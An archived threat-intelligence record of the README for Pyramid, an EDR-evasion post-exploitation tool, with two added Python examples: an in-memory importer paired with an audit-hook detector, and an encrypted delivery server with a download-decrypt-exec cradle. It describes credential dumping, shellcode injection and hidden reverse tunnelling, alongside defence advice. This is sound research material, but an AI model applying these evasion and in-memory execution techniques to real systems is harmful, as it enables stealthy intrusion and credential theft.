{
	"id": "9aed8c3e-df34-4f7b-adcf-46564267ab7c",
	"created_at": "2026-04-06T01:30:51.946231Z",
	"updated_at": "2026-04-10T13:12:03.743037Z",
	"deleted_at": null,
	"sha1_hash": "2151e10d42d8cd95b9d0c927db004d394160aad6",
	"title": "GitHub - naksyn/Pyramid: a tool to help operate in EDRs' blind spots",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1781804,
	"plain_text": "GitHub - naksyn/Pyramid: a tool to help operate in EDRs' blind spots\r\nBy naksyn\r\nArchived: 2026-04-06 00:46:34 UTC\r\npython 3.7+\r\nNaksyn\r\nWhat is it\r\nPyramid is composed of:\r\n1. a Python HTTP/S server that can deliver encrypted files (ChaCha20, XOR)\r\n2. Python modules that can load in-memory dependencies of offensive tooling such as Bloodhound-py, secretsdump, LaZagne, Pythonnet, DonPAPI, pythonmemorymodule, paramiko, pproxy.\r\n3. fixed Python dependencies (zip files) that can be imported in memory\r\n4. a Python cradle that can download, decrypt and execute Pyramid modules in memory\r\nWhy is it useful\r\nPyramid is useful for performing post-exploitation tasks in an evasive manner, executing offensive tooling from a signed binary (e.g. python.exe) by importing its dependencies in memory. This can be achieved because:\r\n1. the Python Embeddable package provides a signed Python interpreter with good reputation;\r\n2. Python has many legitimate applications, so a lot of varied telemetry already comes from the python.exe binary, since the interpreter natively calls the underlying APIs. This can be abused by operating within the python.exe process and blending in with the huge \"telemetry fingerprint\" of the python.exe binary;\r\n3. there is a lack of auditing for Python code execution. PEP 578 added audit hooks to CPython (3.8+), but the stock python.exe binary installs no hook, so dynamic code execution goes unlogged by default;\r\n4. operations can be done natively from within python.exe, using the Python language to perform post-exploitation tasks such as dynamically importing Python modules to run offensive tools and executing Beacon Object Files (after some BOF modifications) directly within python.exe.\r\nFor more information please check the DEFCON30 Adversary Village talk \"Python vs Modern Defenses\" slide deck and this post on my blog.\r\nDisclaimer\r\nThis tool was created to demonstrate a bypass strategy against EDRs based on some blind-spot assumptions. It is a combination of already existing techniques and tools in a (to the best of my knowledge) novel way that can help evade defenses. The sole intent of the tool is to help the community increase awareness around this kind of usage and accelerate a resolution. It's not a 0day, it's not a full-fledged shiny C2; Pyramid exploits what might be EDR blind spots, and the tool has been made public to shed some light on them. A defense paragraph has been included, hoping that experienced blue-teamers can help contribute and provide a better possible resolution to the issue Pyramid aims to highlight. All information is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer is responsible for any direct or consequential damage or loss arising from any person or organization.\r\nCredits\r\nPyramid's in-memory loading was initially inspired by, and expands upon, xorrior's Empyre Finder class.\r\nContributors\r\nsnovvcrash built the modules mod-DonPAPI.py, mod-LaZagne.py and mod-clr.py\r\nCurrent features\r\nPyramid modules' capabilities can be executed directly from a Python interpreter and are currently:\r\n1. Downloading, decryption and in-memory loading of Python dependencies.\r\n2. Dynamic loading and execution of BloodHound Python, impacket secretsdump, DonPAPI, LaZagne.\r\n3. In-memory loading of a remotely fetched dll or exe via PythonMemoryModule.\r\n4. SOCKS5 proxying through an SSH reverse port forward tunnel.\r\n5. In-memory .NET assembly loading via Pythonnet.\r\nPyramid HTTP server main features:\r\n1. on-the-fly encryption (ChaCha20, XOR) of files to be delivered\r\n2. auto-generation of server configs based on the pyramid command line\r\n3. decoding and decryption of HTTP parameters (URL)\r\n4. Basic HTTP Authentication\r\nCradle main features:\r\n1. Downloading, decryption and in-memory execution of Pyramid modules.\r\n2. Depends on the Python standard library only.\r\nDescription\r\nPyramid can be used with a Python interpreter already existing on a target machine, or by unpacking an official embeddable Python package and then running python.exe to execute a Python download cradle. This is a simple way to avoid creating an uncommon process-tree pattern and to look like normal Python application usage.\r\nIn Pyramid the download cradle is used to reach a Pyramid server via HTTP/S to fetch modules and dependencies.\r\nModules are specific to the feature you want to use and contain:\r\n1. A custom Finder class to import the required dependencies (zip files) in memory.\r\n2. Code to download the required dependencies.\r\n3. The main logic for the program you want to execute (bloodhound, secretsdump, paramiko etc.).\r\nThe Python dependencies have already been fixed and modified so that they can be imported in memory without conflicting.\r\nThere are currently 8 Pyramid modules available:\r\n1. bh.py will in-memory import and execute python-BloodHound.\r\n2. secretsdump.py will in-memory import and execute Impacket secretsdump.\r\n3. shellcode.py is a simple in-memory shellcode injector.\r\n4. DonPAPI.py will in-memory import and execute DonPAPI. Results and extracted credentials are saved on disk in the Python Embeddable Package directory.\r\n5. LaZagne.py will in-memory import and execute LaZagne.\r\n6. tunnel-socks5 imports and executes paramiko on a new thread to create an SSH remote port forward to an SSH server; a SOCKS5 proxy server is then executed locally on the target and made accessible remotely through the SSH tunnel.\r\n7. clr imports Pythonnet to load and execute a .NET assembly in memory.\r\n8. pythonmemorymodule imports PythonMemoryModule to load a dll from memory.\r\nUsage\r\nStarting the server\r\ngit clone https://github.com/naksyn/Pyramid\r\nGenerate SSL certificates for the HTTP server:\r\nopenssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365\r\nIf you want to use your own signed SSL certificate be sure to:\r\n1. use PEM format\r\n2. rename the files to key.pem and cert.pem\r\n3. place both files into the Server folder.\r\nConfiguring the module\r\nAs an example, if you want to use pythonmemorymodule with Pyramid, put your payload in the Delivery_files folder, then open pythonmemorymodule.py and configure the needed parameters at the top of the script, such as the name of the payload file and the procedure you want to call after the PE has been loaded.\r\nUnzip the embeddable package and execute the download cradle on the target\r\nOnce the Pyramid server is running and the base script is ready, you can set the variable pyramid_module in the Agent/cradle.py file and execute it on the target. The cradle is built to run with Python standard libraries only.\r\nExample\r\nExample of running the Pyramid HTTP server using an SSL certificate, providing Basic Authentication, encrypting delivery files using ChaCha20, auto-generating server configuration in modules and printing a pastable cradle for pythonmemorymodule:\r\npython3 pyramid.py -p 443 -ssl -u testuser -pass Sup3rP4ss! -enc \"chacha20\" -passenc \"TestPass1\" -se\r\nUpon startup pyramid.py will parse its own folder structure to look for key.pem and cert.pem, and will deliver files from the Server folder.\r\n[video: PyMM.mp4]\r\nTip for executing Pyramid without a visible prompt\r\nTo execute Pyramid without bringing up a visible python.exe prompt you can leverage pythonw.exe, which won't open a console window upon execution and is contained in the very same Windows Embeddable Package. The following picture illustrates an example usage of pythonw.exe to execute base-tunnel-socks5.py on a remote machine without opening a python.exe console window.\r\nLimitations\r\nDynamically loading Python modules does not natively support importing *.pyd files, which are essentially DLLs. The only public solution to my knowledge that solves this problem is provided by Scythe (in-memory-execution) by re-engineering the CPython interpreter. In order not to lose the digital signature, one solution that still allows using the native Python embeddable package involves dropping the required pyd files or wheels on disk. This should not have significant OPSEC implications in most cases; however, bear in mind that the following wheels containing pyd files are dropped on disk to allow dynamic loading to complete:\r\n- Cryptodome - needed by Bloodhound-Python, Impacket, DonPAPI and LaZagne\r\n- bcrypt, cryptography, nacl, cffi - needed by paramiko\r\nHow to defend from this technique\r\npython.exe is a signed binary with good reputation and does not provide visibility on dynamic Python code. Pyramid exploits these evasion properties by carrying out offensive tasks from within the same python.exe process. For this reason, one of the most efficient solutions would be to block by default binaries and DLLs signed by the Python Software Foundation, creating exceptions only for users who actually need to use Python binaries.\r\nAlerts on downloads of embeddable packages can also be raised.\r\nDeploying PEP 578 audit hooks is also feasible, although complex (the original README links a sample implementation). However, deploying PEP 578 hooks without blocking the usage of stock Python binaries could make this countermeasure useless, since an attacker can simply bring along an unhooked interpreter.\r\nSource: https://github.com/naksyn/Pyramid",
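	"editor_example_in_memory_import": "Added worked example (not code from the Pyramid repository) for the custom Finder class described under Description and for the PEP 578 countermeasure under How to defend from this technique. It zips a constructed two-file package entirely in memory, imports it through a MetaPathFinder that never touches disk, and at the same time runs an audit hook that flags the two things a defender can key on: a finder on sys.meta_path that does not come from CPython's frozen importlib modules, and an exec() of a code object whose co_filename is not an existing file. The package name demo_dep, the memory: origin prefix and the hook logic are assumptions for illustration; Pyramid's own Finder and its XOR/ChaCha20 download step are not reproduced here.

```python
import importlib.abc
import importlib.util
import io
import os
import sys
import zipfile

# Constructed sample dependency, zipped in memory so the example runs offline.
# Pyramid fetches and decrypts such zips from its server; the import mechanics are the same.
SAMPLE_FILES = {
    'demo_dep/__init__.py': 'from .impl import hexdump',
    'demo_dep/impl.py': '''
def hexdump(data):
    return ' '.join('%02x' % b for b in data)
''',
}

# Finders that ship with CPython live in these frozen modules; anything else is foreign.
STOCK_FINDER_MODULES = {'_frozen_importlib', '_frozen_importlib_external'}


def build_zip_bytes(files):
    '''Zip a {path: source} mapping into bytes without writing a file.'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        for name, src in files.items():
            zf.writestr(name, src)
    return buf.getvalue()


class ZipBytesFinder(importlib.abc.MetaPathFinder):
    '''Resolve and execute modules from a zip held in memory; nothing touches disk.'''

    def __init__(self, zip_bytes):
        self.zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
        self.members = set(self.zf.namelist())

    def find_spec(self, fullname, path=None, target=None):
        base = fullname.replace('.', '/')
        for member, is_pkg in ((base + '/__init__.py', True), (base + '.py', False)):
            if member in self.members:
                spec = importlib.util.spec_from_loader(
                    fullname, self, origin='memory:' + member, is_package=is_pkg)
                spec.loader_state = member  # remember which archive entry to execute
                return spec
        return None

    def create_module(self, spec):
        return None  # let importlib build a plain module object

    def exec_module(self, module):
        spec = module.__spec__
        source = self.zf.read(spec.loader_state).decode('utf-8')
        # co_filename becomes the fake origin; a file-backed loader would carry a real path
        exec(compile(source, spec.origin, 'exec'), module.__dict__)


# Defensive side: a PEP 578 audit hook (Python 3.8+). A stock python.exe installs none,
# so these entries only exist if the defender adds the hook to the interpreter.
AUDIT_LOG = []


def audit_hook(event, args):
    if event == 'import':
        # args: (module, filename, sys.path, sys.meta_path, sys.path_hooks)
        for finder in args[3]:
            if getattr(finder, '__module__', '') not in STOCK_FINDER_MODULES:
                name = finder.__name__ if isinstance(finder, type) else type(finder).__name__
                AUDIT_LOG.append(('foreign-finder', args[0], name))
    elif event == 'exec':
        # args: (code_object,) - fires when exec()/eval() receive a code object
        filename = args[0].co_filename
        if not os.path.isfile(filename):
            AUDIT_LOG.append(('exec-non-file', filename))


sys.addaudithook(audit_hook)


def run_in_memory_import(zip_bytes, package='demo_dep'):
    '''Install the finder, import the package purely from memory, use it, then clean up.'''
    finder = ZipBytesFinder(zip_bytes)
    sys.meta_path.insert(0, finder)
    try:
        # a real import call, so the import audit event fires exactly as it would for Pyramid
        mod = __import__(package)
        result = mod.hexdump(b'abc')
    finally:
        sys.meta_path.remove(finder)
        for name in [n for n in sys.modules if n == package or n.startswith(package + '.')]:
            del sys.modules[name]
    return result, list(AUDIT_LOG)


if __name__ == '__main__':
    digest, log = run_in_memory_import(build_zip_bytes(SAMPLE_FILES))
    print(digest)
    for entry in log:
        print(entry)
```

Run the block directly to see the hexdump result followed by the audit entries. Audit hooks cannot be removed once added, so the hook stays for the life of the process; a real deployment would install it from sitecustomize.py or an embedded-interpreter wrapper and forward the entries to a log sink instead of a list, and would treat the foreign-finder signal as a lead rather than a verdict, since legitimate packaging tools also register finders.",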
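	"editor_example_cradle": "Added worked example (not the Pyramid server or Agent/cradle.py) for the HTTP server and cradle features listed above and for the Usage section: an in-process HTTP server that gates delivery behind Basic Authentication and XOR-encrypts a constructed module on the fly, plus a standard-library-only cradle that downloads it, decrypts it and exec()s it in memory. XOR stands in for the ChaCha20 option because it needs no third-party package; the credentials and key are copied from the Usage example, the /module.py path and the module body are assumptions, and the server listens on loopback only.

```python
import base64
import http.client
import http.server
import threading

# Constructed stand-ins: credentials and key taken from the Usage example, and the
# module source the server hands out. XOR replaces Pyramid's ChaCha20 option so the
# example needs nothing outside the standard library.
USERNAME = 'testuser'
PASSWORD = 'Sup3rP4ss!'
XOR_KEY = b'TestPass1'
MODULE_PATH = '/module.py'
MODULE_SOURCE = b'''
def module_main():
    return 'module ran inside the cradle process'
RESULT = module_main()
'''


def xor_bytes(data, key):
    '''Symmetric repeating-key XOR; applying it twice restores the input.'''
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def basic_auth_header(user, password):
    return 'Basic ' + base64.b64encode((user + ':' + password).encode()).decode()


class EncryptingHandler(http.server.BaseHTTPRequestHandler):
    '''Serve the module only to authenticated clients, encrypting it on the fly.'''

    def do_GET(self):
        if self.headers.get('Authorization') != basic_auth_header(USERNAME, PASSWORD):
            self.send_response(401)
            self.end_headers()
            return
        if self.path != MODULE_PATH:
            self.send_response(404)
            self.end_headers()
            return
        body = xor_bytes(MODULE_SOURCE, XOR_KEY)  # plaintext never leaves the server process
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # keep the example quiet


def start_server():
    srv = http.server.HTTPServer(('127.0.0.1', 0), EncryptingHandler)  # loopback, random port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(host, port, path, auth_header=None):
    '''Raw GET; returns (status, body).'''
    conn = http.client.HTTPConnection(host, port, timeout=5)
    headers = {'Authorization': auth_header} if auth_header else {}
    conn.request('GET', path, headers=headers)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, body


def cradle(host, port, path, user, password, key):
    '''Download, decrypt and execute a module in memory using only the standard library.'''
    status, ciphertext = fetch(host, port, path, basic_auth_header(user, password))
    if status != 200:
        raise RuntimeError('server refused the request: %d' % status)
    plaintext = xor_bytes(ciphertext, key)
    namespace = {}
    exec(compile(plaintext, '<cradle>', 'exec'), namespace)  # nothing is written to disk
    return namespace['RESULT']


def demo():
    '''Start the server, show the auth gate, then run the cradle; returns (unauth status, result).'''
    srv = start_server()
    try:
        port = srv.server_address[1]
        unauth_status, _ = fetch('127.0.0.1', port, MODULE_PATH)
        result = cradle('127.0.0.1', port, MODULE_PATH, USERNAME, PASSWORD, XOR_KEY)
        return unauth_status, result
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == '__main__':
    print(demo())
```

The unauthenticated request is included to show the authentication gate returning 401 before any bytes are served, which is why a delivery server like this is hard to fingerprint by crawling. Repeating-key XOR gives no real confidentiality against anyone who can guess plaintext (the module source here starts with the word def); Pyramid offers it alongside ChaCha20 and the example keeps it only to make the round trip self-contained.",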
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/naksyn/Pyramid"
	],
	"report_names": [
		"Pyramid"
	],
	"threat_actors": [],
	"ts_created_at": 1775439051,
	"ts_updated_at": 1775826723,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2151e10d42d8cd95b9d0c927db004d394160aad6.pdf",
		"text": "https://archive.orkl.eu/2151e10d42d8cd95b9d0c927db004d394160aad6.txt",
		"img": "https://archive.orkl.eu/2151e10d42d8cd95b9d0c927db004d394160aad6.jpg"
	}
}